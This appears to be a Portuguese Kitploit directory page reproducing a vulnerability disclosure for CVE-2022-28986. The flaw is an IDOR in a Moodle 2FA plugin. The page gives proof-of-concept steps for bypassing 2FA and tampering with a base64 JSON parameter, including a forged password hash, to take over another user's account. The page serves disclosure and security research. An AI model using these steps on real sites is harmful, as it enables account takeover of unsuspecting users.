Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-28986 — Vulnerabilidade de referência direta não segura a objetos (IDOR) no "Simple 2FA Plugin for Moodle" por LMS Doctor | Kitploit
Ferramentas/GitHubGitHub/flaviupopescu/cve-2022-28986
Análise de VulnerabilidadesEvasão de IDS/IPSExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubflaviupopescu/cve-2022-28986

CVE-2022-28986

Vulnerabilidade de referência direta não segura a objetos (IDOR) no "Simple 2FA Plugin for Moodle" por LMS Doctor

Ver Repositório
210há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-28986

Uma vulnerabilidade de Referência Direta Insegura a Objetos (IDOR) no "Simple 2FA Plugin for Moodle" da LMS Doctor

Detalhes da Vulnerabilidade

Risco : Crítico

Fornecedor: LMS Doctor - Simple 2 Factor Authentication Plugin For Moodle

Divulgado por: Flaviu Popescu

Descrição: Vulnerabilidade de Referência Direta Insegura a Objetos (IDOR) no Simple 2FA Plugin for Moodle da "LMS Doctor". Permite que atacantes remotos atualizem registros confidenciais, como e-mail, senha e número de telefone de outras contas de usuário.

Prova de conceito:

Processo de login inicial usando uma conta autocadastrada (dionach.tester):

POST /login/index.php

image

Quando a solicitação de 2FA é exibida, o atacante força a navegação para a seguinte URL em vez de fornecer o código 2FA.

POST /auth/simple2fa/profile.php

image

Esta requisição é capturada no Burp Suite: image

O parâmetro "u" contém uma string codificada em base64. A string é decodificada, revelando dados em formato JSON, conforme mostrado abaixo:

image

O atacante adultera os dados JSON, modificando o id, o e-mail, a senha e o nome. Os dados JSON são codificados novamente em base64, atualizados no Burp Suite e encaminhados ao servidor.

Nova geração de hash para a senha:

$ htpasswd -bnBC 10 "" pwn3d! | tr -d ':\n'\n
$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy                     

Trecho dos dados adulterados:

{"id":"8045","auth":"email","confirmed":"1","policyagreed":"0","deleted":"0","suspended":"0","mnethostid":"1","username":"dionach.tester2","password":"$2y$10$g/U56Hj5kb.C1mOoO6MR.Zrv1c4ml04z97CC.BdJPsMl.6LM4HVy","idnumber":"","firstname":"Dio","lastname":"Nach","email":"flaviu.popescu+1337@[..]", [..]

Resultando na atualização da conta da vítima, id 8045 (dionach.tester2), conforme mostrado abaixo:

image

Baixar ferramenta